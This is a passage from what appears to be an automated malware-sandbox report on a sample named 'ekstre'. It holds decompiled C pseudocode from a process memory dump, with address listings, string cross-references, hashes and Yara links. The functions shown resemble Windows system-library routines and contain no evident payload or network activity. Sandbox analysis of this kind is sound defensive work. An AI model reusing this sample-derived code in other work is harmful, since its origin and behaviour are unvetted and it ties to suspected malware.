						L12:
						_t116 = 0;
						goto L13;
					}
					_t9 = _t118 + 4; // 0x8c1284d
					_t119 = E34191C48(_t108,  *_t9,  &_v36, 0,  &_v60);
					if(_t119 < 0) {
						goto L27;
					}
					_t100 = _v60;
					_t116 = _v32;
					_v20 = _t116;
					if(_t100 != 0) {
						_v36 = _t100;
						_v32 = _v56;
						_t102 = _v52;
					} else {
						_t102 = 0;
					}
					_v84 = 0x18;
					if(_t116 == 0) {
						goto L33;
					} else {
						_v80 = _t102;
						goto L10;
					}
				}
			}

0x34179666
0x34179669
0x3417966b
0x3417966e
0x34179671
0x34179674
0x34179677
0x3417967c
0x00000000
0x34179693
0x3417969e
0x341d2696
0x341797e8
0x341797ec
0x341d2719
0x341d271c
0x341d2721
0x341d2721
0x341797f6
0x341d2729
0x341d272c
0x341d272e
0x341d272e
0x341797df
0x00000000
0x341797df
0x341796a6
0x341796ad
0x341796b1
0x341796b2
0x341796b8
0x341d26a2
0x341d26a5
0x341d26a8
0x341d26ab
0x341d26ae
0x341d26b5
0x341d26b5
0x341796ff
0x34179702
0x34179709
0x34179710
0x34179713
0x3417971a
0x3417971d
0x34179722
0x34179726
0x341d26fb
0x3417974b
0x3417974d
0x00000000
0x00000000
0x34179753
0x34179759
0x3417975e
0x3417975f
0x34179760
0x34179761
0x34179766
0x3417976c
0x34179770
0x00000000
0x00000000
0x34179772
0x34179773
0x34179774
0x34179779
0x3417977c
0x34179780
0x34179783
0x34179784
0x34179785
0x34179789
0x3417978a
0x3417978c
0x34179798
0x3417979a
0x3417979c
0x3417979f
0x341797a4
0x341797a4
0x341797a9
0x00000000
0x341797ab
0x341797b5
0x341797fd
0x341797fd
0x341797b9
0x00000000
0x341797bb
0x341797c1
0x341797c3
0x341797c8
0x341797cd
0x341797cd
0x341797cf
0x341797d4
0x341d2706
0x341d270c
0x341d270f
0x341d270f
0x341797da
0x341797dd
0x341797dd
0x00000000
0x341797d4
0x341797b9
0x341797a9
0x3417972c
0x34179731
0x341d26d2
0x341d26d6
0x00000000
0x00000000
0x341d26dc
0x341d26df
0x341d26eb
0x341d26f1
0x34179739
0x34179746
0x00000000
0x34179746
0x34179737
0x34179737
0x00000000
0x34179737
0x341796be
0x341796cf
0x341796d3
0x00000000
0x00000000
0x341796d9
0x341796dc
0x341796df
0x341796e5
0x341d26be
0x341d26c4
0x341d26c7
0x341796eb
0x341796eb
0x341796eb
0x341796ed
0x341796f6
0x00000000
0x341796fc
0x341796fc
0x00000000
0x341796fc
0x341796f6

Strings

@, xrefs: 34179713

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: dcae17f77d168ca62456beabade8d49296cdb41dc510e20d8f84779336e3a8e9
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: 756159B5D10B19EFEB11CFA5C880BEEBBB9AF85750F114199E820B7250D7748A05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341FF42F Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E341FF42F(short* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char* _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v84;
				signed int _t48;
				signed int _t55;
				intOrPtr _t84;
				short _t87;
				intOrPtr _t89;
				void* _t97;
				intOrPtr _t98;
				signed int _t101;

				_t90 = __ecx;
				_v76 = _v76 & 0x00000000;
				_t87 = 0;
				_v72 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0) {
					_t48 = 0xc000000d;
					goto L26;
				} else {
					if( *__ecx == 0x5c) {
						E341B5050(__ecx,  &_v68, __ecx);
						L8:
						_v24 = _v24 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_push(0x4021);
						_v20 =  &_v68;
						_push(7);
						_push( &_v52);
						_v28 = 0x18;
						_push( &_v28);
						_push(0x100001);
						_v16 = 0x40;
						_push( &_v76);
						_t55 = E341B2CE0();
						_t101 = _t55;
						if(_t87 == 0) {
							L13:
							if(_t101 >= 0) {
								_t97 = E34185D90(_t90,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x410);
								if(_t97 != 0) {
									E341B5050(_t90,  &_v60, _v72);
									_push(0);
									_push( &_v68);
									_push("true");
									_push(3);
									_push(0x410);
									_push(_t97);
									_push( &_v60);
									_push(0);
									_push(0);
									_push(0);
									_push(_v84);
									_t101 = E341B2D00();
									if(_t101 >= 0) {
										_t66 =  *(_t97 + 0x3c);
										if( *(_t97 + 0x3c) <= 0x104) {
											_t89 = E34185D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t66 + 4);
											if(_t89 != 0) {
												_t39 = _t97 + 0x5e; // 0x5e
												L341B88C0(_t89, _t39,  *(_t97 + 0x3c));
												 *((short*)(_t89 + ( *(_t97 + 0x3c) >> 1) * 2)) = 0;
												 *_a4 = _t89;
											} else {
												_t101 = 0xc0000017;
											}
										}
									}
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
								} else {
									_t101 = 0xc0000017;
								}
							}
							L22:
							if(_v76 != 0) {
								_push(_v76);
								E341B2A80();
							}
							_t48 = _t101;
							L26:
							return _t48;
						}
						_t98 = _v32;
						if(_t98 != 0) {
							asm("lock xadd [edi], eax");
							if((_t55 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t98 + 4)));
								E341B2A80();
								L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t98);
							}
						}
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t87);
						goto L13;
					}
					_push( &_v44);
					_push(0);
					_push( &_v68);
					_t90 = 2;
					_t101 = E34191C48(__ecx, __ecx);
					if(_t101 < 0) {
						goto L22;
					} else {
						_t84 = _v44;
						_t87 = _v64;
						if(_t84 != 0) {
							_v68 = _t84;
							_v64 = _v40;
						}
						goto L8;
					}
				}
			}

0x341ff42f
0x341ff43a
0x341ff443
0x341ff445
0x341ff44c
0x341ff607
0x00000000
0x341ff463
0x341ff467
0x341ff4a9
0x341ff4ae
0x341ff4ae
0x341ff4b7
0x341ff4bc
0x341ff4c1
0x341ff4c6
0x341ff4ce
0x341ff4d0
0x341ff4d5
0x341ff4dd
0x341ff4de
0x341ff4e7
0x341ff4ef
0x341ff4f0
0x341ff4f5
0x341ff4f9
0x341ff536
0x341ff538
0x341ff554
0x341ff558
0x341ff56d
0x341ff578
0x341ff579
0x341ff57a
0x341ff57c
0x341ff57e
0x341ff57f
0x341ff584
0x341ff585
0x341ff586
0x341ff587
0x341ff588
0x341ff591
0x341ff595
0x341ff597
0x341ff59f
0x341ff5b5
0x341ff5b9
0x341ff5c5
0x341ff5ca
0x341ff5d9
0x341ff5e0
0x341ff5bb
0x341ff5bb
0x341ff5bb
0x341ff5b9
0x341ff59f
0x341ff5ee
0x341ff55a
0x341ff55a
0x341ff55a
0x341ff558
0x341ff5f3
0x341ff5f8
0x341ff5fa
0x341ff5fe
0x341ff5fe
0x341ff603
0x341ff60c
0x341ff612
0x341ff612
0x341ff4fb
0x341ff501
0x341ff506
0x341ff50a
0x341ff50c
0x341ff50f
0x341ff520
0x341ff520
0x341ff50a
0x341ff531
0x00000000
0x341ff531
0x341ff46f
0x341ff470
0x341ff475
0x341ff478
0x341ff47e
0x341ff482
0x00000000
0x341ff488
0x341ff488
0x341ff48c
0x341ff493
0x341ff495
0x341ff49d
0x341ff49d
0x00000000
0x341ff493
0x341ff482

Strings

@, xrefs: 341FF4E7

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: fe7b577017947ea55983bba1309a150f7e3a80523e8db9a046a833c61ce73c18
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: 60519DB2604B05AFE7218F14CC80F5BB7E9FB84754F400A6EF584972A0DBB6E9058B95

Uniqueness

Uniqueness Score: -1.00%

Function 342386A8 Relevance: 1.4, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E342386A8(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				void* _t69;
				signed int _t73;
				signed char _t86;
				signed int _t89;

				_t74 = __edx;
				_push(__ecx);
				_t86 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0xb0));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t89 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = L34239BB8(_t57, _t86, _t74, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E34238565(_t86, _t74, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t73 = _t89;
					} else {
						_t73 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t73;
					_t62 = _a8;
					L11:
					_t74 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t86 + 0x10)) == _t89) {
						L19:
						if(( *(_t86 + 0xc) & 0x10000000) == 0) {
							L22:
							_t75 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t89 - 2;
								if(_t89 != 2) {
									_t33 = _t89 + 2; // 0x2
									__eflags = (_t33 << 7) + _t86;
									_t89 = L3423BA66((_t33 << 7) + _t86, _t75, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E3423A553(_t86, _v8, _t57);
								asm("sbb esi, esi");
								_t89 =  ~_t89;
								_t41 = E34183C40();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t89;
										if(_t89 != 0) {
											E3422F247(_t86, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E3423DE9F(_t57, 0x34266dc8, (_t75 -  *0x34266dc4 >> 0x14) + (_t75 -  *0x34266dc4 >> 0x14), _t86, _t89, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t75 = _v12;
							_t27 = _t47 - 1; // -1
							_t89 = _t27;
							goto L25;
						}
						_t62 = _t86;
						if(L34239B4D(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t89);
						_push(_t89);
						_push(_t89);
						_t24 =  &_v8; // 0x34266830
						_push( *_t24);
						_t69 = 9;
						E34235FED(_t69, _t86);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(L342178DE(_t62, _t86, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t89;
							}
							goto L19;
						}
						_t62 = _t86;
						_t36 = E34238565(_t62, _t74, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x342386a8
0x342386b0
0x342386b7
0x342386b9
0x342386c0
0x342386cb
0x342386cf
0x342386dc
0x342386dc
0x342386df
0x342386e1
0x342386e3
0x342386e6
0x3423870f
0x34238712
0x34238714
0x00000000
0x00000000
0x3423871a
0x3423871f
0x34238722
0x34238724
0x00000000
0x342386e8
0x342386ef
0x342386f6
0x34238702
0x342386fd
0x342386fd
0x342386fd
0x34238707
0x3423870a
0x34238726
0x34238726
0x3423872a
0x34238730
0x34238774
0x3423877b
0x342387a4
0x342387a4
0x342387a8
0x342387ab
0x342387ce
0x342387ce
0x342387d1
0x3423882a
0x34238831
0x34238838
0x00000000
0x34238838
0x342387d3
0x342387d4
0x342387dc
0x342387e3
0x342387e5
0x342387e7
0x342387ec
0x342387ee
0x34238800
0x342387f0
0x342387f9
0x342387f9
0x34238805
0x34238808
0x3423880a
0x34238810
0x34238817
0x34238819
0x3423881b
0x34238823
0x34238823
0x3423881b
0x34238817
0x00000000
0x34238808
0x342387b6
0x342387be
0x342387c3
0x342387c5
0x00000000
0x00000000
0x342387c7
0x342387cb
0x342387cb
0x00000000
0x342387cb
0x34238781
0x3423878c
0x00000000
0x00000000
0x3423878e
0x3423878f
0x34238790
0x34238791
0x34238791
0x34238799
0x3423879a
0x00000000
0x34238737
0x34238737
0x34238739
0x34238748
0x3423874b
0x00000000
0x00000000
0x3423874d
0x34238753
0x00000000
0x00000000
0x34238762
0x3423876e
0x3423883a
0x34238842
0x34238842
0x00000000
0x3423876e
0x3423873d
0x3423873f
0x34238746
0x00000000
0x00000000
0x00000000
0x34238746
0x34238730

Strings

0h&4, xrefs: 34238791

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: 0h&4
API String ID: 0-1975634612
Opcode ID: a767103951cfaf019c8c71ab322bb8519fe52269396662400dea2b2ae7f3954f
Instruction ID: c32f9c3f5c9ac1146a5f6ac7e88470e8fe0b106f556dce0d9c73bb6c0d66d48a
Opcode Fuzzy Hash: a767103951cfaf019c8c71ab322bb8519fe52269396662400dea2b2ae7f3954f
Instruction Fuzzy Hash: FD41E6F97126069FE715CA26C890B6BB7FBEF806A0F50825DFC15AF280DB74D901C691

Uniqueness

Uniqueness Score: -1.00%

Function 3418E547 Relevance: 1.4, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E3418E547(unsigned int __ecx, void* __edx, void* __eflags) {
				char _v24;
				char _v32;
				unsigned int _v36;
				short _v38;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed short _v50;
				unsigned int _v52;
				char _v56;
				char _v57;
				intOrPtr _v60;
				char _v61;
				char _v73;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t47;
				intOrPtr _t51;
				void* _t55;
				char _t60;
				void* _t68;
				void* _t78;
				unsigned int _t81;
				unsigned int _t82;
				void* _t94;
				void* _t95;
				void* _t97;
				unsigned int _t99;
				short _t100;
				signed int _t101;
				void* _t103;

				_t82 = __ecx;
				_t103 = (_t101 & 0xfffffff8) - 0x2c;
				_v44 = _v44 & 0x00000000;
				_push(_t78);
				_push(_t97);
				_push(_t94);
				_push( &_v44);
				_push(0);
				_push(0x34141050);
				E3418F2F0(_t78, _t94, _t97, __eflags);
				_t95 = E3417DE20(_t82, __eflags, _v56, "true", 0xd,  &_v52);
				if(_t95 == 0) {
					_t47 = 0;
					L15:
					return _t47;
				}
				_t99 = 0;
				_t81 = _v52 >> 5;
				_v44 =  *( *[fs:0x30] + 0x38);
				_v40 = 0;
				_v36 = 0;
				_v52 = 0;
				if(_t81 == 0) {
					L14:
					_t47 = _t99;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t51 =  *((intOrPtr*)(_t95 + 4));
					if(_t51 == 0) {
						break;
					}
					_push(4);
					_v48 = _t51 + _v56;
					_t55 = E341B74B0(_t51 + _v56, "EXT-");
					_t103 = _t103 + 0xc;
					_t108 = _t55;
					if(_t55 != 0) {
						L11:
						_t95 = _t95 + 0x20;
						_t82 = _v52 + 1;
						_v52 = _t82;
						if(_t82 < _t81) {
							continue;
						}
						break;
					}
					E341B5010(_t82,  &_v32, _v48);
					_t100 = E3416ADA0(_t82, _t108,  &_v40);
					if(_t100 > (_v50 & 0x0000ffff)) {
						__eflags = _t100 - 0xfffe;
						if(_t100 >= 0xfffe) {
							_t99 = 0xc0000095;
							break;
						}
						__eflags = _v36;
						if(_v36 != 0) {
							L34183B90( &_v40);
						}
						_t60 = E34185D60(_t100);
						_v40 = _t60;
						__eflags = _t60;
						if(_t60 == 0) {
							_t99 = 0xc000009a;
							break;
						} else {
							_v38 = _t100;
							L6:
							E3418C560( &_v40,  &_v32, 0);
							E3418DF36(0,  &_v52, 0x14d0);
							_t99 = E3419015C(_v60,  &_v56, 0,  &_v73,  &_v40);
							if(_t99 < 0 || _v57 == 0) {
								_t68 = 0x14d3;
							} else {
								_t68 = (0 | _v24 == 0x00000000) + 0x14d1;
							}
							E3418DF36(0,  &_v40, _t68);
							if(_v61 != 0 && E341904C0(0x34141174,  &_v24, ?str?) == 0) {
								_t99 = E3418E4F8(_v56, _t95);
								__eflags = _t99;
								if(_t99 < 0) {
									break;
								}
								_t99 = 0;
							}
							goto L11;
						}
					}
					_v40 = 0;
					goto L6;
				}
				if(_v36 != 0) {
					L34183B90( &_v40);
				}
				goto L14;
			}

0x3418e547
0x3418e54f
0x3418e552
0x3418e55b
0x3418e55c
0x3418e55d
0x3418e55e
0x3418e55f
0x3418e561
0x3418e566
0x3418e57d
0x3418e581
0x3418e706
0x3418e6b9
0x3418e6bf
0x3418e6bf
0x3418e58d
0x3418e593
0x3418e599
0x3418e59f
0x3418e5a3
0x3418e5a7
0x3418e5ad
0x3418e6b7
0x3418e6b7
0x00000000
0x00000000
0x00000000
0x00000000
0x3418e5b3
0x3418e5b3
0x3418e5b3
0x3418e5b8
0x00000000
0x00000000
0x3418e5c2
0x3418e5ca
0x3418e5ce
0x3418e5d3
0x3418e5d6
0x3418e5d8
0x3418e692
0x3418e696
0x3418e699
0x3418e69a
0x3418e6a0
0x00000000
0x00000000
0x00000000
0x3418e6a0
0x3418e5e7
0x3418e5fb
0x3418e5ff
0x3418e6d5
0x3418e6db
0x3418e711
0x00000000
0x3418e711
0x3418e6dd
0x3418e6e2
0x3418e6e9
0x3418e6e9
0x3418e6ef
0x3418e6f4
0x3418e6f8
0x3418e6fa
0x3418e70a
0x00000000
0x3418e6fc
0x3418e6fc
0x3418e60c
0x3418e618
0x3418e628
0x3418e646
0x3418e64a
0x341d986f
0x3418e65b
0x3418e665
0x3418e665
0x3418e671
0x3418e67b
0x3418e6cb
0x3418e6cd
0x3418e6cf
0x00000000
0x00000000
0x3418e6d1
0x3418e6d1
0x00000000
0x3418e67b
0x3418e6fa
0x3418e607
0x00000000
0x3418e607
0x3418e6ab
0x3418e6b2
0x3418e6b2
0x00000000

Strings

EXT-, xrefs: 3418E5C4

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 8dd04eeec055e42179957342649e4496f602bf006822b90650dcdae132149b51
Instruction ID: 259b9649522a062497d1e69b137769cddfb64f0171c30aca1dc41f33b2bfb913
Opcode Fuzzy Hash: 8dd04eeec055e42179957342649e4496f602bf006822b90650dcdae132149b51
Instruction Fuzzy Hash: DE41A072618B119FE720CA61C8C4B9BB7E9AF88754F500A6DF584E7280EB74C9048F93

Uniqueness

Uniqueness Score: -1.00%

Function 341A41BB Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E341A41BB(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = L341858B0(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E341B2CE0();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E341B2E40();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E341B2A80();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xf22dc81a
							_t109 = E34185D90(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2003f22d
								L341B88C0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2003f22d
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E341B2A80();
										L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x341a41cf
0x341a41d5
0x341a41dc
0x341a41e3
0x341a41ee
0x341a41f0
0x341a41f4
0x341a41fc
0x341a4204
0x341a4209
0x341a4211
0x341a4212
0x341a421b
0x341a421f
0x341a4220
0x341a4228
0x341a422c
0x341a4230
0x341a4239
0x341a4240
0x341a4247
0x341a424e
0x341e2e52
0x341e2e52
0x341a4254
0x341a4254
0x341a4256
0x341a425c
0x341a4261
0x341a4262
0x341a426b
0x341a426f
0x341e2e49
0x341e2e49
0x341e2e4d
0x00000000
0x341a4275
0x341a4275
0x341a4289
0x341a428d
0x341e2e44
0x00000000
0x341a4293
0x341a4297
0x341a429e
0x341a42a5
0x341a42ab
0x341a42ae
0x341a42b2
0x341a42b5
0x341a42bc
0x341a42c0
0x341a42d4
0x341a42db
0x341a42df
0x341a42e2
0x341a42e7
0x341a42ea
0x341a42f0
0x341a430b
0x341e2e59
0x341e2e5d
0x341e2e6e
0x341e2e73
0x341a4311
0x341a4314
0x341a4322
0x341a4327
0x00000000
0x341a4327
0x341a42f2
0x341a42f2
0x341a42f5
0x341a42f7
0x341a42f7
0x341a42f0
0x341a428d
0x341a426f
0x341a424e
0x341a42ff

Strings

@, xrefs: 341A4220

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: 1ccbde6cf6e7af3afab704db12d6b771eb4f215ead6735ba222a22bbb5b3859d
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: B8517C75604B109FD320CF69C880A6BB7F9FF48710F00892EF995976A0E7B4E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 341F9429 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E341F9429(void* __edx) {
				intOrPtr _v8;
				signed short* _v12;
				void* __ecx;
				void* _t16;
				signed int _t17;
				intOrPtr _t20;
				void** _t21;
				signed int _t22;
				void* _t24;
				void** _t30;
				signed int _t31;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				intOrPtr _t42;
				signed int _t45;
				void* _t47;
				void* _t53;
				void* _t54;
				signed short* _t55;
				signed int _t60;
				signed short* _t65;
				void* _t66;
				void* _t67;

				_push(_t39);
				_push(_t39);
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t53 = E34185D90(_t39,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x24);
				if(_t53 == 0) {
					L21:
					_t16 = 0xc0000017;
				} else {
					_t17 = 9;
					memset(_t53, 0, _t17 << 2);
					_t67 = _t66 + 0xc;
					_t42 =  *0x34141b98; // 0x1a0018
					 *((intOrPtr*)(_t53 + 8)) = _t42;
					_t20 =  *0x34141b9c; // 0x34154444
					 *((intOrPtr*)(_t53 + 0xc)) = _t20;
					_t21 =  *0x34265244; // 0x0
					if( *_t21 != 0x34265240) {
						L20:
						_push(3);
						asm("int 0x29");
						goto L21;
					} else {
						 *_t53 = 0x34265240;
						_t65 = 0x34265000;
						 *(_t53 + 4) = _t21;
						 *_t21 = _t53;
						 *0x34265244 = _t53;
						if( *0x34265000 == 0) {
							L19:
							_t16 = 0;
						} else {
							_t54 = 0x20;
							do {
								_t35 = 9;
								while(1) {
									_t22 =  *_t65 & 0x0000ffff;
									_t45 = _t22;
									if(_t22 != _t54 && _t22 != _t35) {
										break;
									}
									_t65 =  &(_t65[1]);
								}
								_t55 = _t65;
								_v12 = _t55;
								if(_t22 == 0) {
									goto L19;
								} else {
									_t60 = 9;
									_t36 = 0x20;
									while(_t45 != _t36 && _t45 != _t60) {
										_t65 =  &(_t65[1]);
										_t31 =  *_t65 & 0x0000ffff;
										_t45 = _t31;
										if(_t31 != 0) {
											continue;
										}
										break;
									}
									_t37 = _v8;
									if(_t55 == _t65) {
										goto L19;
									} else {
										 *_t65 = 0;
										_t24 = L341B79A0(_t55, L"verifier.dll");
										_pop(_t47);
										if(_t24 == 0) {
											goto L18;
										} else {
											_t38 = E34185D90(_t47, _t37, 0, 0x24);
											if(_t38 == 0) {
												goto L21;
											} else {
												memset(_t38, 0, _t60 << 2);
												_t67 = _t67 + 0xc;
												_t11 = _t38 + 8; // 0x8
												E341B5050(_t11, _t11, _v12);
												_t30 =  *0x34265244; // 0x0
												if( *_t30 != 0x34265240) {
													goto L20;
												} else {
													 *_t38 = 0x34265240;
